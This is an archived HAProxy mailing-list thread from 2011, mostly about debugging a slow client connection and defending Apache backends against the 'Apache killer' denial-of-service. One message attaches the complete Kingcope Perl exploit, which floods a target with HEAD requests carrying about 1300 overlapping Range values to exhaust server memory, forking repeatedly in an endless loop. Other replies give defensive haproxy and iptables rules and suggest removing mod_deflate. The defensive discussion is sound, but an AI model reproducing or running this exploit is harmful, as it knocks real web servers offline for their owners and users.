Re: Website crawling while connecting via haproxy balanced url

2011-08-22 Thread Willy Tarreau
Hi Amol,

On Mon, Aug 22, 2011 at 09:01:31AM -0700, Amol wrote:
> Hi,
> One of my testers complained this morning that he can access the servers
> fine when he hits them individually, with decent response times, but when
> he accesses them via the haproxy load-balanced URL, the website crawls
> for him. The other interesting thing is that people at other locations
> have no issues at all.
> 
> So can you please tell me how I can debug this very specific issue with
> this connection?
> 
> What we have tried so far:
> 
> restart his Mac
> restart his home router
> reset Safari
> reset Firefox
> 
> But the issue still persists.

Well, at least the haproxy configuration would help, and ideally you
should take tcpdump traces on the haproxy machine for this IP address.
That way you'd be able to:
  1) say whether or not what he sees is normal
  2) determine if the issue is client-side or haproxy-side
  3) find a workaround or a fix
  4) sometimes discover a bug somewhere :-)
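
For example, something like this, where eth0 and 192.0.2.10 are only
placeholders for your public interface and the tester's IP address:

  tcpdump -npi eth0 -s0 -w tester.pcap host 192.0.2.10 and port 80

You can then read the capture back with "tcpdump -nr tester.pcap" or open
it in wireshark to look for retransmits and long response times.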

Regards,
Willy




Re: Defending against the "Apache killer"

2011-08-22 Thread Willy Tarreau
On Mon, Aug 22, 2011 at 07:57:10PM +0200, Baptiste wrote:
> Hi,
> 
> Why not simply drop this "Range:bytes=0-" header?

Agreed. Protecting against this vulnerability is not a matter of limiting
connections or whatever. The attack makes mod_deflate exhaust the process'
memory. What is needed is to remove the Range header when there are too
many occurrences of it.

Their attack puts up to 1300 Range values. Let's remove the header if
there are more than 2:

reqidel ^Range if { hdr_cnt(Range) gt 2 }

That should reliably defeat the attack.
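
In context, a minimal sketch (the frontend and backend names are just
placeholders):

  frontend www
      bind :80
      reqidel ^Range if { hdr_cnt(Range) gt 2 }
      default_backend apache

A legitimate client rarely has a reason to send more than a couple of
ranges, so this should be harmless for normal traffic.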

Regards,
Willy




Re: Defending against the "Apache killer"

2011-08-22 Thread Willy Tarreau
On Mon, Aug 22, 2011 at 06:26:01PM +, Svancara, Randall wrote:
> This is nothing new, as brute-force DoS attacks have been around for a
> while. I am not sure whether this is an HAProxy feature or more of a
> mod_security/iptables feature. Simple iptables rate limiting would be
> sufficient to thwart this attack. For example,
> 
> I am using this for SSH now, but it is very applicable to a web server;
> change the port and hitcount to numbers more appropriate for a webserver,
> like 40 hits in 10 seconds.
> 
> # Drop those nasty brute force SSH attempts and log them
> $IPTABLES -A INPUT -p tcp --dport 22 -i $EXTIF -m state --state NEW -m recent --set
> $IPTABLES -A INPUT -p tcp --dport 22 -i $EXTIF -m state --state NEW -m recent --update --seconds 60 --hitcount 4 -j SSHBRUTEDROP
> 
> I am using the above code to block ssh brute force attempts.

Doing so is already possible with haproxy, but it has nothing to do with
this attack: it's not a matter of request rate but of memory exhaustion
on the server due to a vulnerability.
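
For the record, rate limiting itself can look like this in haproxy (a
minimal sketch, the numbers are purely illustrative):

  frontend www
      bind :80
      rate-limit sessions 100

But again, that would not stop this particular attack, which does its
damage with very few requests.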

Regards,
Willy




Frontend instant 200 response

2011-08-22 Thread Guy Knights
Hi,

We have some HTTP calls from our app that we'd like to fire and forget, but
we need the Haproxy frontend to send a response to the requester immediately
after it passes the request to the backend queue. The intention is to
replace our Gearman setup and thus save us some time in maintenance and
management, since we can then deal purely in HTTP calls; it also saves us
having to write PHP scripts for Gearman processing. What we need is to be
able to execute a curl call and get a response back as soon as possible, so
the curl call can complete and the script can finish processing.

The chain we want is:

1. Local webserver --- request ---> Haproxy frontend
2. Local webserver <--- local OK response --- Haproxy frontend --- request (queue) ---> Haproxy backend
3. Haproxy backend --- request ---> Remote webserver
4. Haproxy backend <--- remote response --- Remote webserver
5. dumped <--- remote response --- Haproxy backend

I hope that makes sense. Can anyone provide any feedback on whether
something like this would be possible?

Thanks,
Guy

-- 
Guy Knights
Systems Administrator
Eastside Games
www.eastsidegamestudio.com
g...@eastsidegamestudio.com


RE: Defending against the "Apache killer"

2011-08-22 Thread Svancara, Randall
This is nothing new, as brute-force DoS attacks have been around for a
while. I am not sure whether this is an HAProxy feature or more of a
mod_security/iptables feature. Simple iptables rate limiting would be
sufficient to thwart this attack. For example,

I am using this for SSH now, but it is very applicable to a web server;
change the port and hitcount to numbers more appropriate for a webserver,
like 40 hits in 10 seconds.

# Drop those nasty brute force SSH attempts and log them
$IPTABLES -A INPUT -p tcp --dport 22 -i $EXTIF -m state --state NEW -m recent --set
$IPTABLES -A INPUT -p tcp --dport 22 -i $EXTIF -m state --state NEW -m recent --update --seconds 60 --hitcount 4 -j SSHBRUTEDROP

I am using the above code to block ssh brute force attempts.
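
(Note: the SSHBRUTEDROP chain referenced above has to exist first; a
minimal sketch of how it might be created, the log prefix is just an
example:)

$IPTABLES -N SSHBRUTEDROP
$IPTABLES -A SSHBRUTEDROP -m limit --limit 5/min -j LOG --log-prefix "SSH brute drop: "
$IPTABLES -A SSHBRUTEDROP -j DROP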

--Randall

-Original Message-
From: Levente Peres [mailto:sheri...@eurosystems.hu] 
Sent: Monday, August 22, 2011 9:54 AM
To: haproxy@formilux.org
Subject: Defending against the "Apache killer"

Hello,

There are a number of webserver-mace apps on the net, the newest I've heard
of being the so-called "Apache killer" script I saw a few days ago on Full
Disclosure... Here you can see a demonstration of what it does. Also, I've
attached the script itself.


http://www.youtube.com/watch?v=fkCQZaVjBhA

I believe we should discuss some possibilities for configuring HAProxy to
protect Apache backends as much as possible, or at least mitigate such
attacks. Any ideas?

Cheers,

Levente



Re: Defending against the "Apache killer"

2011-08-22 Thread Kai

Hi,

1. install nginx as a frontend
2. install the latest version of Apache as the backend (AFAIR 2.2.18 was
already not vulnerable to this DoS, and 2.2.19 should be OK too)

3. remove Apache's mod_deflate (see the note below)
4. done
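
(For step 3, on Debian-style installs this might be as simple as the
following; on other layouts, comment out the corresponding LoadModule
line in httpd.conf instead:)

a2dismod deflate
service apache2 restart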


--
Cheers,

Kai



Re: Defending against the "Apache killer"

2011-08-22 Thread Baptiste
Hi,

Why not simply drop this "Range:bytes=0-" header?

cheers


2011/8/22 Levente Peres:
> Hello,
>
> There are a number of webserver-mace apps on the net, the newest I've
> heard of being the so-called "Apache killer" script I saw a few days ago
> on Full Disclosure... Here you can see a demonstration of what it does.
> Also, I've attached the script itself.
>
> http://www.youtube.com/watch?v=fkCQZaVjBhA
>
> I believe we should discuss some possibilities for configuring HAProxy
> to protect Apache backends as much as possible, or at least mitigate
> such attacks. Any ideas?
>
> Cheers,
>
> Levente
>



Defending against the "Apache killer"

2011-08-22 Thread Levente Peres

Hello,

There are a number of webserver-mace apps on the net, the newest I've heard
of being the so-called "Apache killer" script I saw a few days ago on Full
Disclosure... Here you can see a demonstration of what it does. Also, I've
attached the script itself.


http://www.youtube.com/watch?v=fkCQZaVjBhA

I believe we should discuss some possibilities for configuring HAProxy to
protect Apache backends as much as possible, or at least mitigate such
attacks. Any ideas?


Cheers,

Levente
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl  [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
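# build the malicious Range value: about 1300 overlapping byte ranges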
$p = "";
for ($k=0;$k<1300;$k++) {
$p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
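# fork a child; the parent continues the loop while the child sends one request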
my $pid = $pm->start and next;  

$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                 Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: 
gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
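# probe the target once; a reply mentioning "Partial" (206 Partial Content)
# suggests the host honors Range requests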
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                 Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: 
gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
print "host seems vuln\n";
return 1;   
} else {
return 0;   
}
}

if ($#ARGV < 0) {
usage;
exit;   
}

if ($#ARGV >= 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
print "Host does not seem vulnerable\n";
exit;   
}
while(1) {
killapache();
}

Website crawling while connecting via haproxy balanced url

2011-08-22 Thread Amol
Hi,
One of my testers complained this morning that he can access the servers
fine when he hits them individually, with decent response times, but when
he accesses them via the haproxy load-balanced URL, the website crawls for
him. The other interesting thing is that people at other locations have no
issues at all.

So can you please tell me how I can debug this very specific issue with
this connection?

What we have tried so far:

restart his Mac
restart his home router
reset Safari
reset Firefox

But the issue still persists.


Please help me.